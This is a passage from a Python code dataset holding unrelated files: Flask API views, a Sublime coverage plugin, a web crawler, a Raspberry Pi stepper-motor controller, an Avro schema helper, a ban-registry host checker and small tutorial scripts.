place.to_dict()\n place_list.append(place_dict)\n return jsonify(place_list)\n\n\n@app_views.route('/places/<place_id>', methods=['GET'],\n strict_slashes=False)\ndef get_place(place_id):\n \"\"\"Returns the place requested\n\n place_id: id of the place to get\"\"\"\n places = list(storage.all(Place).values())\n for place in places:\n if place.id == place_id:\n return jsonify(place.to_dict())\n abort(404)\n\n\n@app_views.route('/places/<place_id>', methods=['DELETE'],\n strict_slashes=False)\ndef delete_place(place_id):\n \"\"\"Deletes a place\n\n place_id: id of the place to delete\"\"\"\n places = list(storage.all(Place).values())\n place = None\n for item in places:\n if item.id == place_id:\n place = item\n if place is None:\n abort(404)\n storage.delete(place)\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route('/cities/<city_id>/places', methods=['POST'],\n strict_slashes=False)\ndef create_place(city_id):\n \"\"\"Creates a new place\"\"\"\n city = storage.get(\"City\", city_id)\n if city is None:\n abort(404)\n place_dict = request.get_json(silent=True)\n if place_dict is None:\n return make_response(\"Not a JSON\", 400)\n\n try:\n place_user_id = place_dict['user_id']\n except KeyError:\n return make_response(\"Missing user_id\", 400)\n user = storage.get(\"User\", place_user_id)\n if user is None:\n abort(404)\n\n try:\n place_name = place_dict['name']\n except KeyError:\n return make_response(\"Missing name\", 400)\n\n place = Place(name=place_name, user_id=place_user_id, city_id=city_id)\n storage.new(place)\n storage.save()\n return jsonify(place.to_dict()), 201\n\n\n@app_views.route('/places/<place_id>', methods=['PUT'],\n strict_slashes=False)\ndef update_place(place_id):\n \"\"\"Updates a place\n\n place_id: id of the place to update\"\"\"\n places = list(storage.all(Place).values())\n place_dict = request.get_json(silent=True)\n if place_dict is None:\n return make_response(\"Not a JSON\", 400)\n for place in places:\n if place.id == place_id:\n for k, v in place_dict.items():\n if k != 'id' and k != 'created_at' and k != 'updated_at'\\\n and k != 'user_id' and k != 'city_id':\n setattr(place, k, v)\n storage.save()\n return jsonify(place.to_dict()), 200\n 
abort(404)\n","sub_path":"api/v1/views/places.py","file_name":"places.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"60939993","text":"from __future__ import print_function\nimport os\nimport sublime\nimport sublime_plugin\nimport subprocess\nimport sys\nimport time\nimport threading\n\nSETTINGS = None\n\n\ndef plugin_loaded():\n global SETTINGS\n SETTINGS = sublime.load_settings('PyCover.sublime-settings')\n if SETTINGS and SETTINGS.get('python') is not None:\n print('Loaded settings for PyCover')\n else:\n print('Error loading settings for PyCover')\n\nif sys.version_info[0] == 2:\n sublime.set_timeout(plugin_loaded, 0)\n\n\nclass SublimePythonCoverageListener(sublime_plugin.EventListener):\n \"\"\"Event listener to highlight uncovered lines when a Python file loads.\"\"\"\n\n def on_load(self, view):\n if SETTINGS.get('onload', False) and 'source.python' in view.scope_name(0):\n view.run_command('show_python_coverage')\n\n\nclass ShowPythonCoverageCommand(sublime_plugin.TextCommand):\n \"\"\"Highlight uncovered lines in the current file\n based on a previous coverage run.\"\"\"\n\n def is_visible(self):\n return self.is_enabled()\n\n def is_enabled(self):\n return 'source.python' in self.view.scope_name(0)\n\n def run(self, edit):\n fname = self.view.file_name()\n if not self.is_enabled() or not fname:\n return\n\n local_settings = self.view.settings()\n if local_settings.get('showing', False):\n self.view.erase_regions('PyCover')\n local_settings.set('showing', False)\n return # Toggle off\n\n cov_file = find(fname, '.coverage')\n if not cov_file:\n status_report('Could not find .coverage file for %s' % fname, wrap=True)\n return\n cov_config = find(fname, '.coveragerc') or ''\n\n # run missing_lines.py with the correct paths\n python = SETTINGS.get('python', '')\n if not python:\n python = which('python')\n ml_file = os.path.join(sublime.packages_path(), 'PyCover', 'scripts',\n 'missing_lines.py')\n p = subprocess.Popen([python, ml_file, cov_file, cov_config, fname],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n threading.Thread(target=missing_lines_callback, args=(self.view, p)).start()\n\n\ndef missing_lines_callback(view, proc, poll_sleep=0.1, poll_timeout=10):\n progress_status = lambda: sublime.status_message('Finding missing lines...')\n sublime.set_timeout(progress_status, 0)\n # poll for results\n tic = time.time()\n while proc.poll() is None:\n if time.time() - tic > poll_timeout:\n msg = 'missing_lines.py timed out after %f s' % (time.time() - tic)\n status_report(msg, wrap=True)\n proc.kill()\n return\n time.sleep(poll_sleep)\n sublime.set_timeout(progress_status, 0)\n\n stdout, stderr = proc.communicate()\n if proc.returncode != 0:\n status_report(stderr.decode('UTF-8'), wrap=True)\n return\n\n # read stdout to parse missing lines\n missing_lines = map(int, stdout.decode('UTF-8').splitlines())\n\n # update highlighted regions\n sublime.set_timeout(lambda: _update_highlighted(view, missing_lines), 0)\n\n\ndef _update_highlighted(view, missing_lines):\n outlines = [\n view.full_line(view.text_point(line_num-1, 0))\n for line_num in missing_lines]\n view.erase_regions('PyCover')\n\n flags = sublime.HIDDEN\n if SETTINGS.get('highlight_uncovered_lines', False):\n flags = sublime.DRAW_NO_OUTLINE\n\n if outlines:\n view.add_regions('PyCover', outlines, 'invalid',\n 'Packages/PyCover/themes/default/bar.png', flags)\n view.settings().set('showing', True)\n status_report('%d 
missing lines annotated.' % len(outlines))\n\n\ndef find(base, *rel, **kwargs):\n access = kwargs.get('access', os.R_OK)\n rel = os.path.join(*rel)\n while True:\n path = os.path.join(base, rel)\n if os.access(path, access):\n return path\n baseprev, base = base, os.path.dirname(base)\n if not base or base == baseprev:\n return\n\n\ndef which(progname):\n exts = os.environ.get('PATHEXT', '').split(os.pathsep)\n for path in os.environ['PATH'].split(os.pathsep):\n for ext in exts:\n fullpath = os.path.join(path, progname + ext)\n if os.path.exists(fullpath):\n return fullpath\n return None\n\n\ndef status_report(message, wrap=False):\n print('PyCover:', message)\n if wrap:\n sublime.set_timeout(lambda: sublime.status_message(message), 0)\n else:\n sublime.status_message(message)\n","sub_path":"PyCover.py","file_name":"PyCover.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"494068659","text":"import pandas as pd\nimport numpy as np\nimport requests\n\n\n\ndef pagnition():\n df=pd.read_csv(\"pagnition/input/johnlewis_com.csv\",usecols=['Category URL\",\"Category Name\",\"First Page\",\"Last Page\",\"Source Domain\",\"Product Count'])\n\n tmpList=['url']\n for url in df['Category URL\",\"Category Name\",\"First Page\",\"Last Page\",\"Source Domain\",\"Product Count']:\n urltmp=''\n numbertmp=0\n if \"\\\",\\\"\" in str(url):\n urltmp = url.split(\"\\\",\\\"\")[0]\n\n numbertmp=url.split(\"\\\",\\\"\")[-1]\n\n perpageCount=30\n # ceil-divide so an exact multiple of perpageCount does not add an empty extra page\n pageNum=max(1, -(-int(numbertmp)//perpageCount))\n for i in range(pageNum):\n # if urltmp !='':\n tmpurl = urltmp+'?page='+str((i+1))\n # else:\n # tmpurl = url +'?Nao='+str(21*(i+1))+'&Ns=None&storeSelection=2408,2414,2409,2407,2404'\n print(tmpurl)\n tmpList.append(tmpurl)\n savedf=pd.Series(tmpList)\n savedf.to_csv(\"pagnition/output/johnlewis_com.csv\",index=False)\n\npagnition()","sub_path":"pagnition/supplier/www.smythestoys.com/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
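The page-count arithmetic in the pagination record is the one spot worth a second look: plain `int(n / k) + 1` adds a phantom page whenever the product count is an exact multiple of the page size. A small, self-contained sketch of the ceiling-division idiom used in the fix:

```python
# -(-n // k) is ceil(n / k) for positive k, with no floating point involved.
def page_count(total_items: int, per_page: int = 30) -> int:
    return max(1, -(-total_items // per_page))

assert page_count(60) == 2   # exact multiple: no empty trailing page
assert page_count(61) == 3
assert page_count(0) == 1    # keep at least one page, matching the script's intent
```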
 +{"seq_id":"545625199","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport shutil\nimport urllib.request\nimport zipfile\nimport json\nimport socket\n\nimport netaddr\n\n\narg_parser = argparse.ArgumentParser(description=\"Roskomnadzor ban registry checker\")\n\narg_parser.add_argument(\"mode\", type=str, choices=(\"fetch\", \"check\"), help=\"run mode\")\narg_parser.add_argument(\"host\", type=str, nargs=\"*\",\n help=\"ip address, network or fqdn to check\")\narg_parser.add_argument(\"--registry-url\", type=str,\n default=\"https://github.com/zapret-info/z-i/archive/master.zip\",\n help=\"Registry repository url\")\n\nscript_args = arg_parser.parse_args()\n\nif script_args.mode == \"check\" and not script_args.host:\n arg_parser.error(\"the host argument is required for check mode\")\n\n\nscript_dir = os.path.dirname(__file__)\nregistry_dir = os.path.join(script_dir, \"registry\")\nregistry_archive = os.path.join(script_dir, \"registry.zip\")\nips_data_file = os.path.join(registry_dir, \"z-i-master\", \"dump.csv\")\nfqdn_data_file = os.path.join(registry_dir, \"z-i-master\", \"nxdomain.txt\")\n\n\ndef fetch():\n if os.path.exists(registry_dir):\n shutil.rmtree(registry_dir)\n\n os.mkdir(registry_dir)\n\n urllib.request.urlretrieve(script_args.registry_url, registry_archive)\n\n # close the archive deterministically instead of relying on GC\n with zipfile.ZipFile(registry_archive, 'r') as zip_f:\n zip_f.extractall(registry_dir)\n\n\ndef check(hosts):\n result = {}\n\n # read the dumps with context managers so the file handles are closed\n with open(ips_data_file, encoding=\"cp1251\") as f:\n ips_data = f.readlines()[1:]\n with open(fqdn_data_file) as f:\n fqdn_data = f.readlines()\n\n for host in hosts:\n try:\n host_obj = netaddr.IPNetwork(host)\n except netaddr.core.AddrFormatError:\n host_obj = host\n\n ip_objs = []\n\n if type(host_obj) is str:\n try:\n host_ips = socket.gethostbyname_ex(host_obj)[2]\n\n for host_ip in host_ips:\n ip_objs.append(netaddr.IPNetwork(host_ip))\n except (ValueError, socket.gaierror):\n host_ip = None\n\n for line in fqdn_data:\n fqdn_reg = line.strip()\n\n if fqdn_reg == host_obj:\n result[host] = result.get(host, [])\n result[host].append(fqdn_reg)\n else:\n ip_objs = [host_obj]\n\n for ip_obj in ip_objs:\n for line in ips_data:\n subnets = line.strip().split(\";\")[0].split(\"|\")\n\n for subnet in subnets:\n subnet_reg = subnet.strip()\n\n try:\n subnet_obj = netaddr.IPNetwork(subnet_reg)\n except netaddr.core.AddrFormatError:\n continue\n\n if ip_obj in subnet_obj:\n result[host] = result.get(host, [])\n result[host].append(subnet_reg)\n\n if result:\n print(json.dumps(result))\n\n\nif script_args.mode == \"fetch\":\n fetch()\nelif script_args.mode == \"check\":\n check(script_args.host)\n","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
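The heart of the checker is netaddr's containment test; a minimal sketch of that one operation in isolation (the addresses here are illustrative):

```python
import netaddr

# A bare address parses as a /32 network, mirroring how the checker
# wraps each host before testing membership.
ip = netaddr.IPNetwork('93.184.216.34')
subnet = netaddr.IPNetwork('93.184.216.0/24')

print(ip in subnet)  # True: IPNetwork supports `in` against another IPNetwork
```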
import SOURCE_SAMPLE_DIR, BASE_SOURCE_URL, driver\n\n\nclass SECNAVPager(Pager):\n \"\"\"Pager for SECNAV crawler\"\"\"\n\n def iter_page_links(self) -> Iterable[str]:\n \"\"\"Iterator for page links\"\"\"\n base_url = 'https://www.secnav.navy.mil'\n doni_url = 'https://www.secnav.navy.mil/doni/default.aspx'\n\n r = requests.get(doni_url)\n soup = bs4.BeautifulSoup(r.content, features=\"html.parser\")\n\n # get target column of list items\n issuance_list = soup.find_all('a', attrs={'class': 'dynamic'})[:2]\n\n # extract links\n for link in issuance_list[:2]:\n if not link['href'].startswith('http'):\n url = base_url + link['href']\n else:\n url = link['href']\n\n yield url\n\n\nclass SECNAVParser(Parser):\n \"\"\"Parser for SECNAV crawler\"\"\"\n\n def parse_docs_from_page(self, page_url: str, page_text: str) -> Iterable[Document]:\n \"\"\"Parse document objects from page of text\"\"\"\n\n parsed_docs = []\n # parse html response\n base_url = 'https://www.secnav.navy.mil'\n\n\n type_suffix = \"\"\n if \"instruction\" in page_url:\n type_suffix = \"INST\"\n if \"notice\" in page_url:\n type_suffix = \"NOTE\"\n\n last_page = \"\"\n try:\n driver.get(page_url)\n WebDriverWait(driver, 20).until(ec.presence_of_element_located((By.XPATH, \"//*[@class='dynamic']\")))\n except TimeoutException as e:\n print(\"Error: \" + str(e))\n print(\"Trying again...\")\n try:\n driver.get(page_url)\n WebDriverWait(driver, 20).until(ec.presence_of_element_located((By.XPATH, \"//*[@class='dynamic']\")))\n except TimeoutException as e:\n print(\"Error: \" + str(e))\n print(page_url + \" cannot be scraped.\")\n return parsed_docs\n while True:\n while last_page == driver.current_url:\n sleep(1)\n html = driver.execute_script(\"return document.documentElement.outerHTML\")\n soup = bs4.BeautifulSoup(html, features=\"html.parser\")\n last_page = driver.current_url\n\n table = soup.find('table', attrs={'class': 'ms-listviewtable'})\n rows = table.find_all('tr')\n for r in rows[1:]:\n td = r.find_all('td')\n doc_name = td[0].text + type_suffix + \" \" + td[1].text\n doc_title = td[2].text\n doc_num = td[1].text\n doc_type = td[0].text + type_suffix\n publication_date = td[3].text\n pdf_url = base_url + td[1].find('a')['href'].replace(\" \", '%20')\n pdf_di = DownloadableItem(\n doc_type='pdf',\n web_url=pdf_url\n )\n source_page_url = driver.current_url\n cac_login_required = re.match('^[A-Za-z]', doc_num) is not None\n version_hash_fields = {\n \"active_status\": td[4].text,\n \"sponsor\": td[5].text,\n \"form\": td[6].text,\n \"reports_control_symbol\": td[7].text,\n \"pages\": td[8].text,\n \"cancelled_date\": td[9].text\n }\n doc = Document(\n doc_name=doc_name.strip(),\n doc_title=doc_title.strip(),\n doc_num=doc_num.strip(),\n doc_type=doc_type.strip(),\n publication_date=publication_date,\n cac_login_required=cac_login_required,\n crawler_used=\"secnav_pubs\",\n source_page_url=source_page_url,\n version_hash_raw_data=version_hash_fields,\n downloadable_items=[pdf_di]\n )\n parsed_docs.append(doc)\n\n if soup.find('td', attrs={'id': 'pagingWPQ3next'}) is not None:\n try:\n next_button = WebDriverWait(driver, 20).until(\n ec.presence_of_element_located((By.XPATH, \"//*[@id='pagingWPQ3next']\")))\n ActionChains(driver).move_to_element(next_button).perform()\n next_button.click()\n except WebDriverException as e:\n print(\"Error: \" + str(e))\n print(\"Cannot go to the next page.\")\n break\n else:\n break\n\n return parsed_docs\n\n\nclass SECNAVCrawler(Crawler):\n \"\"\"Crawler for the SECNAV publications site\"\"\"
\n def __init__(self, *args, **kwargs):\n super().__init__(\n *args,\n **kwargs,\n pager=SECNAVPager(\n starting_url=BASE_SOURCE_URL\n ),\n parser=SECNAVParser()\n )\n\n\nclass FakeSECNAVCrawler(Crawler):\n \"\"\"SECNAV crawler that just uses stubs and local source files\"\"\"\n def __init__(self, *args, **kwargs):\n with open(os.path.join(SOURCE_SAMPLE_DIR, 'secnav_pubs.html')) as f:\n default_text = f.read()\n\n super().__init__(\n *args,\n **kwargs,\n pager=SECNAVPager(\n requestor=MapBasedPseudoRequestor(\n default_text=default_text\n ),\n starting_url=BASE_SOURCE_URL\n ),\n parser=SECNAVParser()\n )\n","sub_path":"dataPipelines/gc_crawler/secnav_pubs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
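The load/wait/retry dance in the parser above repeats itself; a hedged sketch of the same pattern factored into one helper (the default XPath and the `driver` argument follow the record, but the helper itself is not part of it):

```python
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import WebDriverWait

def get_with_retry(driver, url, xpath="//*[@class='dynamic']", attempts=2, timeout=20):
    """Load `url` and wait until `xpath` is present, retrying before giving up."""
    for _ in range(attempts):
        try:
            driver.get(url)
            WebDriverWait(driver, timeout).until(
                ec.presence_of_element_located((By.XPATH, xpath)))
            return True
        except TimeoutException as e:
            print("Error: " + str(e))
    return False
```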
 +{"seq_id":"618874630","text":"#!/usr/bin/env python\n\n# Based on: https://www.raspberrypi.org/forums/viewtopic.php?t=242928\\.\n#\n# Software to drive 4 wire stepper motor using a TB6600 Driver\n# RPi - RPi 3B\n#\n# Route 3.3 VDC to the controller \"+\" input for each: ENA, PUL, and DIR\n#\n# Connect GPIO pins (as shown below) to the \"-\" input for each: ENA, PUL, and DIR\n#\n#\nimport time\nimport atexit\nimport threading\nimport random\nimport board\nimport sys, tty, termios, time\nfrom time import sleep\nimport RPi.GPIO as GPIO\n#\nPUL = 17 # Stepper Drive Pulses\nDIR = 27 # Controller Direction Bit (High for Controller default / LOW to Force a Direction Change).\nENA = 22 # Controller Enable Bit (High to Enable / LOW to Disable).\n# DIRI = 14 # Status Indicator LED - Direction\n# ENAI = 15 # Status indicator LED - Controller Enable\n#\n# NOTE: Leave DIR and ENA disconnected, and the controller WILL drive the motor in Default direction if PUL is applied.\n# \nGPIO.setmode(GPIO.BCM)\n# GPIO.setmode(GPIO.BOARD) # Do NOT use GPIO.BOARD mode. Here for comparison only. \n#\nGPIO.setup(PUL, GPIO.OUT)\nGPIO.setup(DIR, GPIO.OUT)\nGPIO.setup(ENA, GPIO.OUT)\n# GPIO.setup(DIRI, GPIO.OUT)\n# GPIO.setup(ENAI, GPIO.OUT)\n#\n\ndef getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\nprint('PUL = GPIO 17 - RPi 3B-Pin #11')\nprint('DIR = GPIO 27 - RPi 3B-Pin #13')\nprint('ENA = GPIO 22 - RPi 3B-Pin #15')\n# print('ENAI = GPIO 14 - RPi 3B-Pin #8')\n# print('DIRI = GPIO 15 - RPi 3B-Pin #10')\n\n#\nprint('Initialization Completed')\n#\n# Could have used only one DURATION constant but chose two. This gives play options.\ndurationFwd = 5000 # This is the duration of the motor spinning, used for forward direction\ndurationBwd = 5000 # This is the duration of the motor spinning, used for reverse direction\nprint('Duration Fwd set to ' + str(durationFwd))\nprint('Duration Bwd set to ' + str(durationBwd))\n#\ndelay = 0.0000001 # This is actually a delay between PUL pulses - effectively sets the motor rotation speed.\nprint('Speed set to ' + str(delay))\n#\ncycles = 1000 # This is the number of cycles to be run once program is started.\ncyclecount = 0 # This is the iteration of cycles to be run once program is started.\nprint('number of Cycles to Run set to ' + str(cycles))\n#\n#\ndef forward():\n GPIO.output(ENA, GPIO.HIGH)\n # GPIO.output(ENAI, GPIO.HIGH)\n print('ENA set to HIGH - Controller Enabled')\n #\n sleep(.5) # pause due to a possible change direction\n GPIO.output(DIR, GPIO.LOW)\n # GPIO.output(DIRI, GPIO.LOW)\n print('DIR set to LOW - Moving Forward at ' + str(delay))\n print('Controller PUL being driven.')\n for x in range(durationFwd): \n GPIO.output(PUL, GPIO.HIGH)\n sleep(delay)\n GPIO.output(PUL, GPIO.LOW)\n sleep(delay)\n GPIO.output(ENA, GPIO.LOW)\n # GPIO.output(ENAI, GPIO.LOW)\n print('ENA set to LOW - Controller Disabled')\n sleep(.5) # pause for possible change direction\n return\n#\n#\ndef reverse():\n GPIO.output(ENA, GPIO.HIGH)\n # GPIO.output(ENAI, GPIO.HIGH)\n print('ENA set to HIGH - Controller Enabled')\n #\n sleep(.5) # pause due to a possible change direction\n GPIO.output(DIR, GPIO.HIGH)\n # GPIO.output(DIRI, GPIO.HIGH)\n print('DIR set to HIGH - Moving Backward at ' + str(delay))\n print('Controller PUL being driven.')\n #\n for y in range(durationBwd):\n GPIO.output(PUL, GPIO.HIGH)\n sleep(delay)\n GPIO.output(PUL, GPIO.LOW)\n sleep(delay)\n GPIO.output(ENA, GPIO.LOW)\n # GPIO.output(ENAI, GPIO.LOW)\n print('ENA set to LOW - Controller Disabled')\n sleep(.5) # pause for possible change direction\n return\n\n# while cyclecount < cycles:\n# forward()\n# reverse()\n# cyclecount = (cyclecount + 1)\n# print('Number of cycles completed: ' + str(cyclecount))\n# print('Number of cycles remaining: ' + str(cycles - cyclecount))\n# #\nwhile True:\n char = getch()\n if(char == \"w\"):\n forward()\n # stepper_worker(kit.stepper1,\n # 20,\n # move_dir[0],\n # stepstyles[3])\n if(char == \"s\"):\n reverse()\n # stepper_worker(kit.stepper1,\n # 20,\n # move_dir[1],\n # stepstyles[3])\n # if(char == \"e\"):\n # stepper_worker(kit.stepper2,\n # 20,\n # move_dir[0],\n # stepstyles[3])\n # if(char == \"d\"):\n # stepper_worker(kit.stepper2,\n # 20,\n # move_dir[1],\n # stepstyles[3])\n if(char == \"o\"):\n quit()\n\nGPIO.cleanup()\nprint('Cycling Completed')\n","sub_path":"Bot codes/drivertest.py","file_name":"drivertest.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
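The `delay` constant in the stepper record only lower-bounds the pulse period — at sub-microsecond sleeps the GPIO calls themselves dominate. A back-of-envelope helper, with the assumption spelled out in the comments:

```python
# Each step drives PUL high then low, sleeping `delay` after each edge,
# so one step costs at least 2 * delay (GPIO call overhead comes on top).
def min_run_time_seconds(steps: int, delay: float) -> float:
    return steps * 2 * delay

print(min_run_time_seconds(5000, 0.0000001))  # 0.001 s floor for 5000 pulses
```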
 +{"seq_id":"473545837","text":"# coding:utf-8\n\nfrom flask import Flask,render_template,request,redirect,url_for\nfrom werkzeug.utils import secure_filename\nimport os\nfrom extraction_info import orc_text\nfrom flask import jsonify\n\n\napp = Flask(__name__)\n\n@app.route('/upload', methods=['POST', 'GET'])\ndef upload():\n if request.method == 'POST':\n f = request.files['file']\n basepath = os.path.dirname(__file__) # directory this file lives in\n upload_path = os.path.join(r'D:\code',secure_filename(f.filename)) # secure_filename sanitizes the client-supplied name\n print(upload_path)\n # upload_path()\n f.save(upload_path)\n result = orc_text(upload_path)\n return ':'.join(result)\n # if request.method == 'POST':\n # f = request.files['file']\n # basepath = path.abspath(path.dirname(__file__)) # absolute path of this file's directory\n # filename = secure_filename(f.filename)\n # upload_path = path.join(basepath, 'static', 'uploads', filename) # target location for the uploaded file\n # f.save(upload_path)\n # return redirect(url_for('upload'))\n\n return render_template(r'upload.html') # upload.html must sit in the templates folder\n\n@app.route('/test', methods=['POST', 'GET'])\ndef testjson():\n return jsonify(name='zhangsan',age=22)\n\nif __name__ == '__main__':\n app.run()","sub_path":"OCR接口/flasktest.py","file_name":"flasktest.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"540753591","text":"import avro\nimport copy\n\ndef specialize(items, spec):\n if isinstance(items, dict):\n for n in (\"type\", \"items\", \"values\"):\n if n in items:\n items[n] = specialize(items[n], spec)\n return items\n if isinstance(items, list):\n n = []\n for i in items:\n n.append(specialize(i, spec))\n return n\n if isinstance(items, basestring):\n if items in spec:\n return spec[items]\n return items\n\ndef extend_avro(items):\n types = {t[\"name\"]: t for t in items}\n n = []\n for t in items:\n if \"extends\" in t:\n r = copy.deepcopy(types[t[\"extends\"]])\n r[\"name\"] = t[\"name\"]\n if \"specialize\" in t:\n r[\"fields\"] = specialize(r[\"fields\"], t[\"specialize\"])\n r[\"fields\"].extend(t[\"fields\"])\n\n for y in [x for x in r[\"fields\"] if x[\"name\"] == \"class\"]:\n y[\"type\"] = {\"type\": \"enum\", \"symbols\": [r[\"name\"]], \"name\": r[\"name\"]+\"_class\"}\n\n\n r[\"extends\"] = t[\"extends\"]\n r[\"abstract\"] = t.get(\"abstract\", False)\n r[\"doc\"] = t.get(\"doc\", \"\")\n types[t[\"name\"]] = r\n t = r\n n.append(t)\n return n\n\ndef schema(j):\n names = avro.schema.Names()\n j = extend_avro(j)\n for t in j:\n if not t.get(\"abstract\"):\n avro.schema.make_avsc_object(t, names)\n return names\n","sub_path":"reference/cwltool/avro_ld/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"150689347","text":"#controlFlow.py\nx = int(input(\"please input an integer:\"))\n\nif x < 0:\n x = 0\n print( 'Negative changed to zero')\nelif x == 0:\n print( 'Zero')\nelif x == 1:\n print( 'Single')\nelse:\n print( 'More')\n\nmylist = ['a','goober','zxv']\n\nfor listmember in mylist:\n print( listmember)\n\n#now use ranges just like we'd do a normal 'for' in C/C++\nprint('mylist = range(12)')\nmylist = range(12)\n\nfor listmember in mylist:\n print( listmember)\n\n#shorthand:\nprint( \"shorthand..\")\nfor listmember in range(3):\n print( listmember)\n\n#negative progression..\nprint( \"start negative progression\")\n# range([start],stop [,step])\nfor currofst in range(0,-10,-1):\n print( currofst)\n \n#while statement.. with continue\n#only print odd numbers, but iterate over all numbers between\n#from 0 to 19\nmyint = 0\nwhile myint < 20:\n if((myint%2) == 0):\n myint += 1\n continue\n print( myint)\n myint += 1\n\n# break on 12\nmyint = 0\nwhile myint < 20:\n if(myint==12):\n break\n print( myint)\n myint += 1\n","sub_path":"Python/controlFlow.py","file_name":"controlFlow.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
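The avro_ld record above is the densest of this batch; a toy run of its `extend_avro`/`specialize` pair (assumed to be in scope from that record) makes the behaviour concrete. The record targets Python 2 (`basestring`), so the sketch adds a one-line shim:

```python
basestring = str  # py3 shim; the record above is Python 2 code

base = {"name": "Base", "fields": [{"name": "class", "type": "string"},
                                   {"name": "items", "type": "T"}]}
child = {"name": "Child", "extends": "Base", "specialize": {"T": "int"},
         "fields": [{"name": "extra", "type": "boolean"}]}

result = extend_avro([base, child])
# Child inherits Base's fields with T -> int, appends `extra`, and its
# `class` field is narrowed to a single-symbol enum named Child_class.
print(result[1]["fields"])
```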
 +{"seq_id":"310928350","text":"\"\"\"This file runs the plugin as a standalone program.\n\nPut your main code in this file and put the worker files into the\nmodule folder. All files in this folder are loaded dynamically.\"\"\"\nimport os\nimport sys\nimport json\n#using the import into global to ensure that files are loaded dynamically\nfrom module import *\nimport lib\n#its best practice to export your convenience functions from this file\n#if your program might be loaded as a module\n\n\ndef analyse(file_data):\n \"\"\"Entry point to the processing code.\n All code from this point should accept a bytestream and return JSON\n \"\"\"\n return processing.processing(file_data)\n\n\ndef analyse_file(file_name, output_folder):\n \"\"\"Called by SPOTLESS for single file matches\n Modify this function if you handle files in a specific way.\n \"\"\"\n if not os.path.isfile(file_name):\n return False\n if not os.path.isdir(output_folder):\n return False\n\n f = open(file_name, 'r')\n try:\n buf = f.read()\n finally:\n #ensure f is closed properly even if there is a problem\n f.close()\n\n #Call our analysis functions\n results = analyse(buf)\n\n try:\n json.loads(results)\n except ValueError:\n return False\n #going to need to save the output somehow at this point...\n #save(results)\n return True\n\n\ndef analyse_folder(folder_name, output_folder):\n \"\"\"Called by SPOTLESS for directory matches\n Modify this function to enable specialised directory processing.\n \"\"\"\n for file_name in lib.fileLib.dirIter(folder_name):\n analyse_file(file_name, output_folder)\n return True\n\n#We run our code only if we are called as the main program,\n#otherwise the module is being imported.\nif __name__ == '__main__':\n\n import argparse\n desc = 'SPOTLESS framework example plugin package'\n parser = argparse.ArgumentParser(description=desc)\n\n parser.add_argument('-i', '--input',\n type=str,\n help='The input file or directory',\n required=True)\n\n parser.add_argument('-o', '--output',\n type=str,\n help='The output file or directory',\n required=True)\n\n args = parser.parse_args()\n\n if not os.path.isdir(args.output):\n print('Critical: Output is not a folder')\n sys.exit()\n\n if os.path.isfile(args.input):\n analyse_file(args.input, args.output)\n elif os.path.isdir(args.input):\n analyse_folder(args.input, args.output)\n else:\n print('Critical: Input is invalid')\n sys.exit()\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"275676089","text":"def changePossibilities(amount, denominations):\n # create a list with size equal to the amount of money plus one\n # the value in each element will be updated to represent the number\n # of combinations possible given the denominations\n combinations = [0] * (amount + 1)\n\n # set the value of the zeroth element to 1 as starting/seed value\n combinations[0] = 1\n \n # loop through every denomination\n for denom in denominations:\n # loop through every amount of money up to 'amount'\n # (use a distinct name so the outer `amount` is not shadowed)\n for amt in range(1, amount + 1):\n if amt >= denom:\n combinations[amt] += combinations[amt - denom]\n \n return combinations[amount]\n\n\nprint(changePossibilities(4, [1, 2, 3]))\nprint(changePossibilities(100, [1, 5, 10, 25, 50]))\n","sub_path":"python_soln/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
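The coin-change DP above counts each multiset of coins exactly once (denominations in the outer loop, amounts in the inner). A brute-force cross-check that enumerates multisets directly — only viable for small amounts, which is exactly what makes it a useful test of the record's function:

```python
from itertools import combinations_with_replacement

def brute_force(amount, denominations):
    # With a smallest denomination of 1, at most `amount` coins are ever needed.
    return sum(1
               for r in range(amount + 1)
               for combo in combinations_with_replacement(denominations, r)
               if sum(combo) == amount)

assert changePossibilities(4, [1, 2, 3]) == brute_force(4, [1, 2, 3]) == 4
```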
